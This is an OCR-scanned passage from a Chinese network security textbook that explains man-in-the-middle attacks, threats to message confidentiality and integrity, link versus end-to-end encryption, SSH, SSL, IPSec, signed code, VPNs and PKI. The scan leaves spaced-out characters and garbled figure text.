个 会 话 的 实体 之 间 。 它 们 之 间 的 区 别 在 于 ,中 间 人 攻击 通常 在 会 话 的 开始 就 参与 进来 了 ， 
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而 会 话 劫持 发 生 在 一 个 会 话 建立 之 后 。 其 实 它们 之 间 的 区 别 仅仅 是 一 种 语义 上 的 区 别 ， 
而 在 实际 上 却 没有 多 大 的 意义 。 中 间 人 攻击 常常 通过 协议 来 描述 ,如 图 7-4 所 示 。 
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A 向 B 发 送 "我 是 A? 的 报 文 ,并 给 出 了 自己 的 身份 。 此 报 文 被 中 间 人 C 截获 ,C 
把 此 报 文 原封 不 动 地 转发 给 B。B 选择 一 个 不 重 数 Rs 发 送 给 A, 但 同样 被 C 截 
获 后 也 照样 转发 给 A。 

中 间 人 C 用 自己 的 私 钥 SKc 对 Rs 加 密 后 发 回 给 B, 使 B 误 以 为 是 A 发 来 的 。A 
收 到 Rs 后 也 用 自己 的 私 钥 SKA 对 Rs 加 密 后 发 回 给 B, 中 途 被 C 截获 并 丢弃 。B 
向 A 索取 其 公 钥 ,此 报 文 被 C 截获 后 转发 给 A。 

C 把 自己 的 公 钥 PKc 冒充 是 A 的 发 送 给 B, 而 C 也 截获 到 A 发 送 给 B 的 公 
钥 PKA。 

B 用 收 到 的 公 钥 PKc( 以 为 是 A 的 ) 对 数据 加 密 发 送 给 A。C 截获 后 用 自己 的 私 
钥 SKc 解密 ,复制 一 份 留 下 ,再 用 A 的 公 钥 PKA 对 数据 加 密 后 发 送 给 A。A 收 
到 数据 后 ,用 自己 的 私 钥 SK。 解密 ,以 为 和 B 进行 了 保密 通信 。 其 实 ,B 发 送 给 
A 的 加 密 数 据 已 被 中 间 人 C 截获 并 解密 了 一 份 。 但 A 和 B 却 都 不 知道 。 


4) 消息 机 密 性 面临 的 威胁 

由 于 使 用 了 公共 网 络 ,攻击 者 可 以 很 容易 破坏 消息 的 机 密 性 (也 可 能 是 消息 的 完整 
性 )。 采 用 前 面 所 讲 过 的 窃听 和 假冒 攻击 可 以 导致 消息 失去 机 密 性 和 完整 性 。 下 面 讨论 
可 能 影响 消息 机 密 性 的 其 他 几 种 弱点 。 

(1) 误 传 。 有 时 ,因为 网 络 硬件 或 者 软件 中 存在 一 些 缺 陷 ,可 能 会 导致 消息 被 误 传 。 
其 中 ,经 常 出 现 的 情况 是 整个 消息 丢失 了 ,这 是 一 个 完整 性 或 者 可 用 性 问题 。 然 而 ,偶尔 
也 会 出 现 目 的 地 址 被 修改 或 者 由 于 某 些 处 理 单元 失效 ,从 而 导致 消息 被 错误 地 传 给 了 其 


他 人 。 


但 是 ,所 有 这 些 “ 随 机 ”事件 都 是 相当 罕见 的 。 


与 网 络 缺 陷 相 比 , 人 为 的 错误 出 现 得 更 为 频繁 。 比 如 ,将 一 个 地 址 100064,30652 输 
成 了 10064,30652 或 100065,30642, 或 者 将 David Ian Walker 的 缩写 diw 输 成 了 idw 或 
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iw ,类似 的 事情 简直 数不胜数 。 计 算 机 网 络 管理 员 通 过 无 意义 的 长 串 数字 或 “神秘 的 ” 首 
字符 缩写 去 识别 不 同 的 人 ,难免 会 出 现 错误 ,而 使 用 有 意义 的 一 些 词 , 如 iwalker, 犯 错误 
的 可 能 性 会 小 些 。 

(2) 暴露 。 为 了 保护 消息 的 机 密 性 ,必须 对 从 它 被 创建 开始 到 被 释放 为 止 的 整个 过 
程 进 行 跟踪 。 在 整个 过 程 中 ,消息 的 内 容 将 暴露 在 临时 缓冲 区 中 ;遍及 整个 网 络 的 交换 
器 ,路 由 器 、 网 关 和 中 间 主 机 中 ;以 及 在 建立 ,格式 化 和 表示 消息 的 进程 工作 区 中 。 被 动 窃 
听 是 一 种 暴露 消息 的 方式 ,同时 也 是 对 传统 网 络 结构 的 破坏 ,因为 在 传统 网 络 结构 中 , 消 
息 只 传送 到 它 的 目的 地 。 最 后 要 指出 的 是 ,在 消息 的 出 发 点 、 目 的 地 或 者 任何 一 个 中 间 结 
点 通过 截取 方式 都 可 以 导致 消息 的 暴露 。 

(3) 流量 分 析 。 有 时 ,不 仅 消息 自身 是 需要 保密 的 ,就 连 存 在 这 条 消息 这 个 事实 都 是 
需要 保密 的 。 例 如 ,在 战争 时 期 ,如 果 敌 人 看 到 了 我 们 的 指挥 部 与 一 个 特别 行动 小 组 之 间 
有 大 量 的 网 络 流量 ,他 们 就 可 以 推测 出 我 们 正在 策划 一 项 与 该 小 组 有 关 的 重大 行动 计划 ; 
在 商业 环境 中 ,如 果 发 现 一 家 公司 的 总 经 理 向 男 一 家 竞争 公司 的 总 经 理发 送 消息 ,就 能 让 
人 推测 到 他 们 企图 垄断 或 共 谋 制定 价格 。 在 政治 环境 中 ,如 果 一 个 国家 与 男 一 个 国家 的 
外 交 关 系 处 于 停顿 状态 ,一 旦 发 现 首 相间 有 通信 活动 ,就 能 让 人 推测 到 两 国 关 系 有 缓和 的 
可 能 。 在 这 些 情况 下 ,我 们 既 需 要 保护 消息 的 内 容 , 也 需要 保护 标识 发 送 者 和 接收 者 的 报 
头 信息 。 

5) 消息 完整 性 面临 的 威胁 

在 许多 情况 下 ,通信 的 完整 性 或 者 正确 性 与 其 机 密 性 至 少 是 同等 重要 的 。 事 实 上 ,在 
很 多 情况 下 完整 性 是 极为 重要 的 ,比如 传递 鉴别 数据 。 

人 们 依赖 电子 消息 来 作为 司法 证 据 并 指导 他 们 的 行动 ,这 种 情况 越 来 越 多 了 。 例 如 ， 
如 果 你 收 到 一 条 来 自 一 个 好 朋友 的 消息 ,让 你 在 下 周 星 期 二 的 晚上 到 某 家 酒馆 去 喝 两 杯 ， 
你 很 可 能 会 在 约定 时 间 准 时 到 达 那 里 。 与 此 类 似 , 假 如 你 的 上 司 给 你 发 了 一 条 消息 ,让 你 
立即 停止 正在 做 的 项 目 A 中 的 所 有 工作 , 转 而 将 所 有 精力 投身 于 项 目 B 中 ,你 也 可 能 会 
遵从 命令 。 只 要 这 些 消 息 的 内 容 是 符合 情理 的 ,我们 就 会 采取 相应 的 行动 ,就 好 像 我 们 收 
到 了 一 封 签名 信件 一 个 电话 或 者 进行 了 一 次 面对面 的 交谈 一 样 。 

然而 ,攻击 者 可 能 会 利用 你 对 消息 的 信任 来 误导 你 。 特 别 是 ,攻击 者 们 可 能 会 : 

(1) 改变 部 分 甚至 全 部 消息 内 容 。 

(2) 完整 地 替换 一 条 消息 ,包括 其 中 的 日 期 .时 间 以 及 发 送 者 /接收 者 的 身份 。 

(3) 重用 一 条 以 前 的 旧 消 息 。 

(4) 摘录 不 同 的 消息 片段 ,组 合成 一 条 消息 。 

(5) 改变 消息 的 来 源 。 

(6) 改变 消息 的 目标 。 

(7) 毁坏 或 者 删除 消息 。 
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1. 数据 加 密 
加 密 是 一 种 强 有 力 的 手段 ,能 为 数据 提供 保密 性 、 真 实 性 、 完 整 性 和 限制 性 访问 。 由 
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于 网 络 常常 面临 着 更 大 的 威胁 ,因此 人 们 常常 使 用 加 密 来 保证 数据 的 安全 ,有 时 可 能 还 会 
结合 其 他 控制 手段 。 

在 研究 加 密 应 用 于 网 络 安全 威胁 前 , 先 考虑 如 下 几 点 。 首 先 ,加 密 不 是 灵丹妙药 。 一 
个 加 密 的 有 缺陷 的 系统 设计 仍然 是 一 个 有 缺陷 的 系统 设计 。 其 次 ,加 密 只 保护 被 加 密 的 
内 容 ( 这 似乎 是 显然 的 ,其 实 并 不 尽 然 )。 在 数据 被 发 送 前 ,在 用 户 的 “ 指 尖 ”到 加 密 处 理 过 
程 之 间 已 经 被 泄露 了 ,这 些 数据 在 远程 被 收 到 并 解码 后 ,它们 再 次 被 泄露 。 最 好 的 加 密 不 
能 避免 那 恶 的 特洛伊 木马 攻击 ,特洛伊 木马 在 加 密 前 拦截 数据 。 最 后 ,加 密 带 来 的 安全 性 
不 会 超过 密 钥 管理 的 安全 性 。 如 果 攻 击 者 能 猜测 或 推导 出 一 个 弱 加 密 密 钥 ,游戏 就 结 
东 了 。 

在 网 络 应 用 软件 中 ,加 密 可 以 应 用 于 两 台 主机 之 间 ( 称 为 链 路 加 密 ) ,也 可 以 应 用 于 两 
个 应 用 软件 之 间 ( 称 为 端 到 端 加 密 ) ,下 面 将 分 别 介绍 这 两 种 形式 。 但 不 管 采用 哪 一 种 加 
密 形 式 , 密 钥 的 分 发 都 是 一 个 问题 。 考 虑 到 用 于 加 密 的 密 钥 必须 以 一 种 安全 的 方式 传递 
给 发 送 者 和 接收 者 ,所 以 在 本 节 中 ,也 要 研究 用 于 实现 网 络 中 安全 的 密 钥 分 发 技术 。 最 
后 ,还 要 研究 一 种 用 于 网 络 计算 环境 的 密码 工具 。 

1) 链 路 加 密 

在 链 路 加 密 技术 中 ,系统 在 将 数据 放 入 物理 通信 和 链 路 之 前 对 其 加 密 。 在 这 种 情况 下 ， 
加 密 发 生 在 OSI 模型 中 的 第 1 层 或 第 2 层 (在 TCP/IP 协议 中 是 这 样 )。 同 样 ,解密 发 生 
在 到 达 并 进入 接收 计算 机 的 时 候 。 链 路 加 密 模型 如 图 7-5 所 示 。 


发 送 者 中 间 主机 接收 者 
协议 层 
消息 
应 用 层 E31 J i 
~~~、 消息 一 
表示 层 一 二 (明文 ) Oo 
,显露 的 、 
会 话 层 c= pe ey 呈 
A be 
传输 层 一 NE 
网 络 屋 = 4 二 呈 — 
数据 链 路 层 ' EREE IE 
物理 屋 Ey El Ey EE3 
加 密 的 消息 
以 明文 形式 暴露 的 消息 


图 7-5 链 路 加 密 模型 


加 密 保 护 了 在 两 台 计算 机 之 间 传 输 的 消息 ,但 存在 于 主机 上 的 消息 是 明文 (明文 意味 
着 “未 经 加 密 ”)。 请 注意 ,因为 加 密 是 在 底层 协议 中 进行 的 ,因而 消息 在 发 送 者 和 接收 者 
的 其 他 所 有 层 上 都 是 暴露 的 。 如 果 有 很 好 的 物理 安全 隔离 措施 ,可 能 不 会 太 在 意 这 种 暴 
露 (比如 ,这 种 暴露 发 生 在 发 送 者 或 者 接收 者 的 主机 或 工作 站 上 ,可 以 使 用 安装 了 警报 器 
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或 者 加 了 重 锁 的 门 保护 起 来 ) 。 然 而 ,应 该 注意 到 ,在 消息 经 过 的 路 径 上 的 所 有 中 间 主 机 
中 ,消息 在 协议 的 上 面 两 层 是 暴露 的 。 暴 露 之 所 以 发 生 ,是 由 于 路 由 和 寻 址 信息 不 是 由 底 
层 读 取 的 ,而 是 在 更 高 层 上 进行 的 。 消 息 在 所 有 中 间 主 机 上 都 是 未 经 加 密 的 ,而 且 不 能 保 
证 这 些 主 机 都 是 值得 信赖 的 。 

链 路 加 密 对 用 户 是 透明 的 。 加 密实 际 上 变 成 了 由 低级 网 络 协 议 层 完成 的 传输 服务 ， 
就 像 消息 寻 址 或 者 传输 错误 检测 一 样 。 图 7-6 表示 的 是 一 条 典型 的 经 过 链 路 加 密 的 消 
息 , 其 中 ,用 阴影 表示 的 部 分 是 被 加 密 过 的 。 因 为 数据 链 路 的 头 部 和 尾部 的 一 些 部 分 是 在 
数据 块 被 加 密 之 前 添加 上 去 的 ,所 以 每 一 个 块 都 有 一 部 分 是 用 阴影 来 表示 的 。 由 于 消息 
M 在 每 一 层 都 要 进行 处 理 , 因 而 头 部 和 控制 信息 在 发 送 端 被 加 上 去 ,在 接收 端 被 删除 。 
硬件 加 密 设 备 运 行 起 来 快速 而 且 可 靠 。 在 这 种 情况 下 , 链 路 加 密 对 操作 系统 和 操作 者 都 
是 透明 的 。 


t t 4 4 
| | | 消息 ! 
| 上 ------- 会 话 层 头 部 | 
! ! 传输 层 头 部 ! 
上 -------------------- 网 络 层 头 部 | 
“--------------------------- 数据 链 路 层 头 部 | 

J 


数据 链 路 层 尾部 -一 -一 


图 7-6 链 路 加 密 后 的 消息 


当 传输 线路 是 整个 网 络 最 大 的 弱点 时 , 链 路 加 密 就 特别 适用 。 如 果 网 络 上 的 所 有 主 
机 都 相当 安全 而 通信 介质 是 与 其 他 用 户 共享 或 者 不 够 安全 的 , 则 链 路 加 密 就 是 一 种 简便 
易 用 的 方法 。 

2) 端 到 端 加 密 

正如 名 称 所 暗示 的 , 端 到 端 加 密 从 传输 的 一 端 到 另 一 端 都 提供 了 安全 保障 。 加 密 可 
以 由 用 户 和 主机 之 间 的 硬件 设备 来 执行 ,也 可 以 由 运行 在 主机 上 的 软件 来 进行 。 在 这 两 
种 情况 下 ,加 密 都 是 在 OSI 模型 的 最 高 层 (第 7 层 , 应 用 层 ; 也 可 能 是 第 6 层 ,表示 层 ) 上 完 
成 的 。 端 到 端 加 密 模 型 如 图 7-7 所 示 。 

由 于 加 密 先 于 所 有 的 寻 址 和 传输 处 理 ,所 以 消息 以 加 密 的 数据 形式 通过 整个 网 络 。 
这 种 加 密 方 式 可 以 克服 在 传输 模型 的 较 低层 上 存在 的 潜在 弱点 ,即使 一 个 较 低层 不 能 保 
持 安全 ,将 它 收 到 的 消息 泄密 了 ,数据 的 机 密 性 也 不 会 遇 到 危险 。 图 7-8 表示 一 条 典型 的 
经 过 端 到 端 加 密 的 消息 ,其 中 也 对 加 密 的 部 分 用 阴影 标注 出 来 了 。 

使 用 端 到 端 加 密 ,消息 即使 经 过 了 多 台 主 机 也 能 够 保证 机 密 性 。 消 息 的 数据 内 容 仍 
然 是 加 密 的 ,而 且 消 息 在 传输 的 时 候 也 是 加 密 的 (可 以 防范 在 传输 过 程 中 泄密 ) 。 因 此 , 即 
使 消息 必须 经 过 A 和 B 之 间 的 路 径 上 潜在 的 不 安全 结 点 的 传递 ,也 能 够 防范 在 传输 中 消 
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图 7-7 端 到 端 加 密 模型 
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加 密 的 
图 7-8 端 到 端 加 密 的 消息 
息 泄密 。 


3) 链 路 加 密 与 端 到 端 加 密 的 比较 

对 消息 进行 简单 加 密 不 能 绝对 保证 在 传输 过 程 中 或 者 在 传输 之 后 它 不 会 被 泄密 。 然 
而 ,在 很 多 情况 下 ,考虑 到 窃听 者 破译 密码 的 可 能 性 和 消息 的 时 效 性 ,加 密 的 力量 已 经 足 
够 强大 了 。 因 为 安全 包含 很 多 方面 的 内 容 , 所 以 必须 在 攻击 的 可 能 性 与 保护 措施 上 求 得 
均衡 ,而 不 必 强 调 绝 对 安全 保证 。 

在 链 路 加 密 方 式 中 ,经 过 一 条 特定 链 路 的 所 有 传输 都 要 调用 加 密 过 程 。 通 常 , 一 台 特 
定 的 主机 与 网 络 只 有 一 条 链 路 相连 ,这 就 意味 着 该 主机 发 出 的 所 有 通信 都 会 被 它 加 密 。 
这 种 加 密 方 案 要 求 接收 这 些 通 信 的 其 他 每 台 主 机 也 必须 用 相应 的 密码 设备 来 对 这 些 消 息 
解密 。 而 且 , 所 有 主机 必须 共享 密 钥 。 一 条 消息 可 能 经 过 一 台 或 者 多 台中 间 主 机 的 传递 ， 
最 终 到 达 接收 端 。 如 果 该 消息 在 网 络 中 的 某 些 链 路 上 经 过 了 加 密 处 理 ,而 在 其 他 链 路 上 
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没有 经 过 加 密 处 理 , 那 么 ,加密 就 失去 了 部 分 优势 。 因 此 ,如 果 一 个 网 络 最 终 决定 采用 链 
路 加 密 , 通 常 是 该 网 络 中 的 所 有 链 路 都 进行 加 密 处 理 。 

与 此 相反 , 端 到 端 加 密 应 用 于 “逻辑 链 路 ,是 两 个 进程 之 间 的 通道 ,是 位 于 物理 路 径 
以 上 的 一 层 。 由 于 在 传输 路 径 上 的 中 间 主 机 不 需要 对 信息 进行 加 密 或 解密 ,所 以 它们 不 
需要 任何 密码 设备 。 因 此 ,加 密 仅仅 用 于 需要 进行 加 密 处 理 的 消息 和 应 用 软件 。 此 外 ,可 
以 使 用 软件 来 进行 加 密 。 这 样 ,可 以 有 选择 地 进行 加 密 , 有 时 对 一 个 应 用 进行 加 密 , 有 了 时 
甚至 可 以 对 一 个 特定 应 用 中 的 某 一 条 消息 进行 加 密 。 

当 考虑 加 密 密 钥 时 , 端 到 端 加 密 的 可 选择 性 优点 却 变 成 了 一 个 缺点 。 在 端 到 端 加 密 
中 ,每 一 对 用 户 之 间 有 一 条 虚拟 的 加 密 信道 。 为 了 提供 适当 的 安全 性 ,每 一 对 用 户 应 该 共 
享 一 个 唯一 的 密码 密 钥 , 密 钥 的 数量 要 求 与 用 户 对 的 数量 相等 , 即 个 用 户 需 要 nX 
(n 一 1)/2 个 密 钥 。 随 着 用 户 数量 的 增加 ,需要 的 密 钥 数量 会 迅速 上 升 。 然 而 ,这 是 假设 
使 用 单 密 钥 加 密 的 情况 下 计算 出 来 的 数量 ,在 使 用 公 钥 的 系统 中 ,每 名 接收 者 仅 需要 一 对 
密 钥 。 

如 表 7-1 所 示 , 链 路 加 密 对 用 户 而 言 速度 更 快 . 更 容易 实施 ,而 且 使 用 的 密 钥 更 少 。 
端 到 端 加 密 更 灵活 ,可 以 有 选择 地 使 用 , 它 是 在 用 户 层次 上 完成 的 ,并 且 可 以 集成 到 应 用 
软件 之 中 。 没 有 一 种 加 密 形式 能 够 适用 于 所 有 情况 。 


表 7-1 链 路 加 密 与 端 到 端 加 密 的 比较 


链 路 加 密 端 到 端 加 密 

数据 在 发 送 主机 上 是 暴露 的 数据 在 发 送 主机 上 是 加 密 的 
主机 内 部 安全 

数据 在 中 间 结 点 上 是 暴露 的 数据 在 中 间 结 点 上 是 加 密 的 

由 发 送 主机 使 用 由 发 送 进 程 使 用 

对 用 户 不 可 见 用 户 使 用 加 密 

由 主机 维护 加 密 用 户 必须 寻找 相应 算法 
用 户 的 任务 一 套 设施 提供 给 所 有 用 户 使 用 用 户 选择 加 密 

加 密 通常 采用 硬件 完成 软 、 硬 件 实现 均 可 

用 户 可 以 选择 是 否 加 密 , 选 择 可 以 针对 

数据 要 么 都 加 密 ,要 么 都 不 加 密 。 | 每 个 数据 项 

要 求 每 一 对 主机 一 个 密 钥 要 求 每 一 对 用 户 一 个 密 钥 
实现 时 考虑 的 问题 

提供 结 点 鉴别 提供 用 户 鉴别 


在 某 些 情况 下 ,两 种 加 密 方式 都 可 以 使 用 。 如 果 用 户 不 信任 系统 提供 的 链 路 加 密 质 
量 , 则 可 以 使 用 端 到 端 加 密 。 同 样 ,如 果 系 统管 理 员 担心 某 个 应 用 程序 中 使 用 的 端 到 端 加 
密 方案 的 安全 性 ,也 可 以 安装 一 台 链 路 加 密 设 备 。 如 果 两 种 加 密 方 式 都 相当 快 ,重复 使 用 
两 种 安全 措施 几乎 没有 负面 影响 。 

4) SSH 加 密 

安全 外 过 协议 (Secure Shell Protocol, SSH) 是 一 对 协议 (版 本 1 和 2), 最 初 是 为 
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UNIX 定义 的 ,但 也 可 用 于 Windows 2000 系统 ,为 Shell 或 者 操作 系统 命令 行 解释 器 提 
供 了 一 个 鉴别 和 加 密 方 法 。 为 实现 远程 访问 ,SSH 的 两 个 版 本 都 取代 了 UNIX 的 系统 工 
具 ( 比 如 Telnet,rlogin 和 rsh 等 )。SSH 能 有 效 防止 欺骗 攻击 和 修改 通信 数据 。 

SSH 协议 还 包括 在 本 地 与 远程 站 点 之 间 协 商 加 密 算 法 (比如 ,DES,IDEA 和 AES 算 
法 ) 以 及 鉴别 (包含 公 钥 和 Kerberos)。 

5) SSL 加 密 

安全 套 接 层 (Secure Sockets Layer,SSL) 协 议 最 初 是 由 Netscape 公司 设计 来 保护 浏 
览 器 与 服务 器 之 间 的 通信 的 。 也 称 传 输 层 安全 (Transport Layer Security, TLS)。SSL 
实现 了 应 用 软件 (比如 浏览 器 ) 与 TCP/IP 协议 之 间 的 接口 ,在 客户 与 服务 器 之 间 提 供 服 
务 器 鉴别 、 可 选 客户 鉴别 和 加 密 通 信 通 道 。 客 户 与 服务 器 为 会 话 加 密 协商 一 组 相互 支持 
的 加 密 方 式 , 可 能 使 用 三 重 DES 和 SHAI, 或 者 128 位 密 钥 的 RC4 以 及 MD5。 

要 使 用 SSL, 客 户 首先 要 请 求 一 个 SSL 会 话 。 服 务 器 用 它 的 公 钥 证 书 响应 ,以 便 客 
户 可 以 确认 服务 器 的 真实 性 。 客 户 返回 用 服务 器 公 钥 加 密 的 对 称 会 话 密 钥 部 分 。 服 务 器 
与 客户 都 要 计算 会 话 密 钥 ,然后 使 用 共享 的 会 话 密 钥 进 行 加 密 通信 。 

该 协议 虽然 简单 ,但 是 很 有 效 ,而 且 是 因特网 上 使 用 最 广 的 安全 通信 协议 。 但 是 ,请 
记 住 SSL 只 保护 从 客户 端 浏 览 器 到 服务 器 解密 点 这 一 段 (服务 器 解密 点 通常 是 指 服务 器 
的 防火 墙 ,或 者 ,稍微 强 一 点 ,是 到 运行 Web 应 用 的 计算 机 )。 从 用 户 键盘 到 浏览 器 ,以 及 
穿 过 接收 者 公司 网 络 , 数 据 都 将 被 泄露 。Blue Gem Security 已 开发 了 一 种 被 称 为 
LocalSSL 的 产品 ,该 产品 可 以 在 键入 数据 时 进行 加 密 , 直 到 操作 系统 将 它 传递 给 浏览 器 ， 
这 样 ,可 以 避免 键盘 记录 的 特洛伊 木马 攻击 ,这 类 木马 一 旦 植 信 用户 计算 机 , 它 就 可 以 泄 
露 用 户 键入 的 任何 数据 。 

6) IPSec 

32 位 因特网 地 址 结构 正在 逐步 被 用 尽 。 一 种 称 为 IPv6(IP 协议 组 的 第 6 个 版 本 ) 的 
新 结构 解决 了 寻 址 问题 。 作 为 IPv6 协议 组 的 一 个 组 成 部 分 ,IETF 采用 了 IP 安全 协议 组 
(IP Security Protocol Suite,IPSec) 。 设 计 中 针对 一 些 基 本 的 缺陷 (例如 容易 遭受 欺骗 、 窃 
听 和 会 话 劫持 等 攻击 ) ,IPSec 协议 定义 了 一 种 标准 方法 来 处 理 加 密 的 数据 。IPSec 协议 
是 在 IP 层 上 实现 的 ,所 以 它 会 影响 到 上 面 各 层 ,特别 是 TCP 和 UDP。 因 此 ,IPSec 要 求 
不 改变 已 经 存在 的 大 量 TCP 和 UDP 协议 。 

IPSec 在 某 些 方面 与 SSL 有 些 相似 ,它们 都 在 某 种 程度 上 支持 鉴别 和 机 密 性 ,也 不 会 
对 其 上 的 层 (在 应 用 层 ) 或 者 其 下 的 层 作 必需 的 重大 改变 。 像 SSL 一 样 ,IPSec 被 设计 成 
与 具体 的 加 密 协议 无 关 , 并 允许 通信 双方 就 一 套 互 相 支 持 的 协议 达成 一 致 。 

7) 签名 代码 

前 面 曾 提 到 一 些 人 可 以 将 活动 代码 放置 在 网 站 上 ,等 着 毫 无 戒心 的 用 户 下 载 。 活 动 
代码 将 使 用 下 载 它 的 用 户 的 特权 运行 ,这 样 , 将 会 造成 很 严重 的 破坏 ,从 删除 文件 \ 发 送 电 
子 邮件 消息 ,到 使 用 特洛伊 木马 造成 轻微 而 难以 察觉 的 损害 等 。 如 今 , 网 站 的 发 展 趋势 是 
允许 从 中 心 站 点 下 载 应 用 软件 和 进行 软件 升级 ,因此 ,下 载 到 一 些 怀 有 恶意 的 东西 的 危险 
性 正在 增加 。 

签名 代码 (Signed Code) 是 减少 这 种 危险 的 一 种 方法 。 一 个 值得 信赖 的 第 三 方 对 一 
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段 代码 追加 一 个 数字 签名 , 言 外 之 意 就 是 使 代码 更 值得 信赖 。PKI 中 有 一 个 签名 结构 有 
助 于 实现 签名 。 

谁 可 以 担当 可 信赖 的 第 三 方 呢 ? 一 个 众所周知 的 软件 生产 商 可 能 是 公认 的 代码 签名 
者 。 但 是 ,对 于 生产 设备 驱动 程序 或 者 代码 插件 的 不 出 名 的 小 公司 是 不 是 也 值得 信赖 呢 ? 
如 果 代码 的 销售 商 不 知名 , 则 他 的 签名 是 没有 用 处 的 ;因为 无 赖 也 可 以 发 布 自己 的 签名 
代码 。 

然而 ,在 2001 年 3 月 ,Verisign 宣布 它 以 微软 公司 的 名 义 错误 地 发 布 了 两 个 代码 签 
名 证 书 给 一 个 声称 是 (但 实际 上 不 是 ) 微 软 公司 的 职员 。 在 错误 被 检查 出 来 之 前 ,这 些 证 
书 已 经 流通 了 将 近 两 个 月 的 时 间 。 虽 然后 来 Verisign 检查 出 了 这 个 错误 并 取消 了 这 些 
证 书 , 而 且 只 需要 检查 Verisign 的 列表 就 可 以 知道 该 证 书 已 被 撤销 ,但 绝 大 多 数 人 都 不 
会 对 下 载 有 微软 公司 签名 的 代码 表示 产生 怀疑 。 

8) 加 密 的 E-mail 

一 个 电子 邮件 消息 很 像 一 张 明 信 片 的 背面 。 邮 件 投递 员 ( 以 及 在 邮政 系统 中 经 手 明 
信和 片 传递 的 任何 人 ) 都 可 以 阅读 其 中 的 地 址 和 消息 部 分 的 任何 内 容 。 为 了 保护 消息 和 寻 
址 信息 的 私有 权 , 可 以 使 用 加 密 来 保护 消息 的 机 密 性 及 其 完整 性 。 

正如 在 其 他 几 种 应 用 中 看 到 的 一 样 , 加 密 是 一 个 相对 比较 容易 的 部 分 , 密 钥 管理 才 是 
一 个 更 困难 的 问题 。 密 钥 管理 通常 有 两 种 主要 的 方法 : 分 别 是 使 用 分 层 的 、 基 于 证 书 的 
PKI 方 案 来 交换 密 钥 以 及 使 用 单一 的 \ 个 人 对 个 人 的 交换 方式 。 分 层 方 法 称 为 S/MIME， 
已 经 广泛 用 于 商业 邮件 处 理 程序 ,比如 Microsoft Exchange 或 者 Eudora。 个 人 方法 称 为 
PGP, 是 一 种 商业 附加 软件 。6. 5 节 将 介绍 加 密 的 E-mail。 

2. 虚拟 专 有 网 

链 路 加 密 可 为 网 络 用 户 提供 一 种 环境 ,在 这 种 环境 中 ,使 他 们 感觉 仿佛 处 在 一 个 专 有 
网 络 中 。 由 于 这 个 原因 ,这 种 方法 被 称 为 虚拟 专 有 了 网络 (Virtual Private Network， 
VPN) 。 

一 般 情况 下 ,物理 安全 性 和 管理 安全 性 对 于 保护 网 络 周 界 内 的 传输 已 经 足够 了 。 因 
此 ,对 用 户 而 言 , 用 户 的 工作 站 (或 者 客户 机 ) 与 主机 网 络 ( 或 者 服务 器 的 周 界 ) 之 间 是 最 大 
的 暴露 之 处 。 

防火 墙 是 一 种 访问 控制 设备 ,常常 安置 在 两 个 网 络 或 者 两 个 网 络 段 之 间 。 它 过 滤 了 
在 受 保 护 的 ( 即 * 内 部 ”网 络 与 不 可 信 的 ( 即 * 外 部 ”网络 或 网 络 段 之 间 的 所 有 流量 。 

许多 防火 墙 都 可 用 于 实现 VPN。 当 用 户 第 一 次 与 防火 墙 建立 一 个 通信 时 ,用 户 可 以 
向 防火 墙 请 求 一 个 VPN 会 话 。 用 户 的 客户 机 与 防火 墙 通过 协商 获得 一 个 会 话 加 密 密 
钥 , 随 后 防火 墙 和 客户 机 使 用 该 密 钥 对 它们 之 间 的 所 有 通信 进行 加 密 。 通 过 这 种 方法 ,一 
个 较 大 的 网 络 被 限制 为 只 允许 进行 由 VPN 所 指定 的 特殊 访问 。 换 名 话说, 用户 的 感觉 
就 像 网 络 是 专 有 的 。 有 了 VPN ,通信 就 经 过 了 一 个 加 密 隧 道 或 者 隧道 。VPN 的 建立 如 
图 7-9 所 示 。 

在 防火 墙 与 网 络 周 界 内 的 鉴别 服务 器 交互 时 ,建立 虚拟 专 有 网 络 。 防 火 墙 会 将 用 户 
鉴别 数据 传递 给 鉴别 服务 器 ,在 确认 了 用 户 的 鉴别 身份 以 后 ,防火 墙 将 给 用 户 提供 适当 的 
安全 特权 。 例 如 ,一 位 熟悉 的 可 信赖 之 人 (比如 一 名 雇员 或 者 系统 管理 员 ) 可 能 会 被 允许 
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暴露 的 通信 介质 经 过 物理 保护 的 周 界 


1. 客户 到 防火 墙 上 进行 鉴别 


2. 防火 墙 以 加 密 密 钥 进行 响应 


用 户 工作 站 (客户 ) 3. 客户 与 服务 器 通过 加 密 隧道 通信 


/ 


图 7-9 建立 虚拟 专 有 网 络 的 过 程 


访问 普通 用 户 不 能 访问 的 资源 。 防 火 墙 在 VPN 的 基础 上 实现 了 访问 控制 。 

3. PKI 与 证 书 

公 钥 基础 设施 (Public Key Infrastructure,PKI) 是 一 个 为 实现 公 钥 加 密 而 建立 的 进 
程 ,常常 用 于 一 些 大 型 (和 分 布 式 ) 应 用 环境 中 。PKI 为 每 一 个 用 户 提 供 了 一 套 与 身份 鉴 
别 和 访问 控制 相关 的 服务 ,包括 : 

(1) 使 用 (公开 的 ) 加 密 密 钥 建立 与 用 户 身 份 相关 的 证 书 。 

(2) 从 数据 库 中 分 发 证 书 。 

(3) 对 证 书签 名 ,以 增加 证 书 真实 性 的 可 信和 度 。 

(4) 确认 (或 者 否认 ) 一 个 证 书 是 有 效 的 。 

(5) 无 效 证 书 意 味 着 持 有 该 证 书 的 用 户 不 再 被 允许 访问 ,或 者 他 们 的 私 钥 已 经 泄密 。 

PKI 常常 被 当 作 一 种 标准 ,但 事实 上 它 定 义 了 一 套 策略 .产品 和 规程 的 框架 。 其 中 的 
策略 定义 了 加 密 系 统 的 操作 规则 ,尤其 是 其 中 指出 了 怎样 处 理 密 钥 和 易 受 攻击 的 信息 ,以 
及 如 何 使 控制 级 别 与 危险 级 别 相 匹配 。 规 程 规定 了 怎样 生成 .管理 和 使 用 密 钥 。 最 后 , 产 
品 实际 上 实现 了 这 些 策略 ,并 实现 了 生成 .存储 和 管理 密 钥 。 

PKI 建立 的 一 些 实体 , 称 为 证 书 管理 中 心 (Certificate Authority) ,实现 了 PKI 证 书 
管理 规则 。 通 常 ,认为 证 书 管理 中 心 是 可 信赖 的 ,因此 ,用 户 可 以 将 证 书 的 解释 、 发 放 、 接 
收 和 回收 工作 委托 给 管理 中 心 来 做 。 证 书 管理 中 心 的 活动 概括 如 下 : 

(1) 对 公 钥 证 书 的 整个 生命 周期 进行 管理 。 

(2) 通过 将 一 个 用 户 或 者 系统 的 身份 绑 定 到 一 个 带 有 数字 签名 的 公 钥 来 发 放 证 书 。 

(3) 为 证 书 安排 终止 日 期 。 

